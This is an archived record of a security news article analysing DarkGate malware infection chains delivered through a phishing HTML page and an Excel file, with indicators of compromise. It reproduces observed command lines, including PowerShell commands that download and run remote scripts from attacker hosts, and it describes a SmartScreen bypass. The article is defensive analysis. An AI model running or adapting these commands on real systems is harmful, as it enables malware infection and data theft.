{
	"id": "d5344dee-15b4-4a79-9719-eac0c590d037",
	"created_at": "2026-04-06T00:07:04.775023Z",
	"updated_at": "2026-04-10T13:12:11.036561Z",
	"deleted_at": null,
	"sha1_hash": "c1517951f81bf521c0c42500610ff9b7b10957c9",
	"title": "Darkgate Malware Leveraging Autohotkey Following Teams",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 484144,
	"plain_text": "Darkgate Malware Leveraging Autohotkey Following Teams\r\nBy Divya\r\nPublished: 2024-04-30 · Archived: 2026-04-05 22:29:33 UTC\r\nResearchers have uncovered a novel infection chain associated with the DarkGate malware.\r\nThis Remote Access Trojan (RAT), developed using Borland Delphi, has been marketed as a Malware-as-a-Service (MaaS) offering on a Russian-language cybercrime forum since at least 2018.\r\nThe DarkGate malware boasts an array of functionalities, including process injection, file download and execution, data theft, shell command execution, and keylogging capabilities.\r\nThe researchers have observed a concerning increase in the spread of DarkGate over the past three months, with a significant global presence, as depicted in the following figure:\r\nGeo-Distribution of DarkGate\r\nBypassing Microsoft Defender SmartScreen\r\nOne of the key findings of the investigation is that the DarkGate malware can circumvent detection by Microsoft Defender SmartScreen.\r\nThis evasion tactic prompted Microsoft to release a patch to address the underlying vulnerability, CVE-2023-36025, which had been identified and patched in the previous year.\r\nThe vulnerability arose from the absence of proper checks and corresponding prompts related to Internet Shortcut (.url) files.\r\nCyber adversaries exploited this flaw by creating malicious .url files capable of downloading and executing harmful scripts, effectively evading the warning and inspection mechanisms of Windows Defender SmartScreen, as per a report by McAfee.\r\nSimilarly, this year, the researchers have identified another vulnerability, CVE-2024-21412, which also allowed for the bypass of the security feature in Internet Shortcut Files.\r\nMicrosoft has since released a patch to address this issue.\r\nInfection Chains Unveiled\r\nThe researchers have identified two distinct initial vectors carrying identical DarkGate shellcode and payload.\r\nhttps://gbhackers.com/darkgate-malware-leveraging/\r\nPage 1 of 6\n\nInfection Chain\r\nThe first vector originates from an HTML file, while the second begins with an XLS file.\r\nLet’s delve into each chain individually to unveil their respective mechanisms.\r\nInfection from HTML\r\nThe infection chain initiates with a phishing HTML page masquerading as a Word document.\r\nUsers are prompted to open the document in “Cloud View,” creating a deceptive lure for unwitting individuals to interact with malicious content.\r\nHTML page\r\nUpon clicking “Cloud View,” users are prompted to grant permission to open Windows Explorer, facilitating the subsequent redirection process.\r\nPrompt confirming redirection to Windows Explorer\r\nThe researchers discovered that the HTML file contained a JavaScript function designed to reverse strings, suggesting an attempt to decode or manipulate encoded data.\r\nUpon further investigation, they found that the highlighted content in the image was a string encoded in reverse Base64 format.\r\nJavascript in HTML code\r\nDecoding the content revealed a URL that utilized the “search-ms” application protocol to execute a search operation for a file named “Report-26-2024.url”.\r\nThe “crumb” parameter was employed to confine the search within the context of the malicious WebDAV share, restricting its scope.\r\nWebDAV share\r\nThe .url file contained a URL parameter that pointed to a VBScript file, which would be automatically executed upon the .url file’s execution.\r\nThis process allowed for executing malicious commands or actions on the system, exploiting the CVE-2023-36025 vulnerability.\r\nContent of .URL file\r\nThe researchers observed that the VBScript file would execute a PowerShell command to fetch a script from a remote location and execute it.\r\nThis script would then proceed to download and execute the AutoHotkey utility, along with a malicious script, ultimately leading to the execution of the DarkGate payload.\r\nProcess tree\r\nFollowing are the command lines:\r\n\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\admin\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\U4IRGC29\\Report-26-2024[1].vbs\"\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -Command Invoke-Expression (Invoke-RestMethod -Uri 'withupdate.com/zuyagaoq')\r\n\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1\r\n\"C:\\rjtu\\AutoHotkey.exe\" C:/rjtu/script.ahk\r\n\"C:\\Windows\\system32\\attrib.exe\" +h C:/rjtu/\r\nInfection from XLS\r\nThe second infection vector originates from a malicious Excel (XLS) file.\r\nWhen the user clicks the “Open” button, a warning prompt appears before the file is opened.\r\nXLS sample\r\nUpon allowing the activity, the researchers observed a similar process tree to the HTML-based infection chain, with the Excel file executing a VBScript file downloaded from a remote location.\r\nProcess tree from Excel file\r\nThe command lines are:\r\n\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\EXCEL.EXE\" \"C:\\Users\\admin\\Documents\\Cluster\\10-apr-xls\\1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4.xlsx\"\r\n\"C:\\Windows\\System32\\WScript.exe\" \"\\\\45.89.53.187\\s\\MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs\"\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -Command Invoke-Expression (Invoke-RestMethod -Uri '103.124.106.237/wctaehcw')\r\n\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1\r\n\"C:\\kady\\AutoHotkey.exe\" C:/kady/script.ahk\r\n\"C:\\Windows\\system32\\attrib.exe\" +h C:/kady/\r\nThe remote script downloaded and executed the same set of files, including the AutoHotkey utility and a malicious script, ultimately executing the DarkGate payload.\r\nRemote script similar to the previous chain\r\nPersistence and Exfiltration\r\nTo maintain persistence, the malware drops a .lnk file in the startup folder, which in turn drops a folder named “hakeede” in the “C:\\ProgramData” directory.\r\nThis folder contains the same set of files, including the AutoHotkey script, executed to run the DarkGate payload.\r\nPersistence\r\nThe researchers also identified data exfiltration to the IP address 5.252.177.207, as shown in the network communication analysis.\r\nNetwork Communication\r\nIP address\r\nThe DarkGate malware’s sophisticated infection chain, leveraging vulnerabilities in Microsoft Defender SmartScreen together with the AutoHotkey utility, highlights the evolving tactics employed by cybercriminals.\r\nThe researchers’ findings underscore the importance of keeping systems up-to-date with the latest security patches and maintaining vigilance against emerging threats.\r\nAs the cybersecurity landscape evolves, individuals and organizations must remain informed and proactive in their defense strategies.\r\nBy understanding the techniques used by malware such as DarkGate, security professionals can develop more effective countermeasures and better protect against such complex and persistent threats.\r\nIndicators of Compromise (IoCs):\r\nFile Hash\r\nHtml file 196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005\r\nURL file 2b296ffc6d173594bae63d37e2831ba21a59ce385b87503710dc9ca439ed7833\r\nVBS 038db3b838d0cd437fa530c001c9913a1320d1d7ac0fd3b35d974a806735c907\r\nautohotkey.exe 897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb\r\nAHK script dd7a8b55e4b7dc032ea6d6aed6153bec9b5b68b45369e877bb66ba21acc81455\r\ntest.txt 4de0e0e7f23adc3dd97d498540bd8283004aa131a59ae319019ade9ddef41795\r\nDarkGate exe 6ed1b68de55791a6534ea96e721ff6a5662f2aefff471929d23638f854a80031\r\nIP 5.252.177.207\r\nXLS file 1a960526c132a5293e1e02b49f43df1383bf37a0bbadd7ba7c106375c418dad4\r\nVBS 2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f\r\nLNK file 10e362e18c355b9f8db9a0dbbc75cf04649606ef96743c759f03508b514ad34e\r\nIP 103.124.106.237\r\nDivya\r\nDivya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.\r\nSource: https://gbhackers.com/darkgate-malware-leveraging/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://gbhackers.com/darkgate-malware-leveraging/"
	],
	"report_names": [
		"darkgate-malware-leveraging"
	],
	"threat_actors": [],
	"ts_created_at": 1775434024,
	"ts_updated_at": 1775826731,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c1517951f81bf521c0c42500610ff9b7b10957c9.pdf",
		"text": "https://archive.orkl.eu/c1517951f81bf521c0c42500610ff9b7b10957c9.txt",
		"img": "https://archive.orkl.eu/c1517951f81bf521c0c42500610ff9b7b10957c9.jpg"
	}
}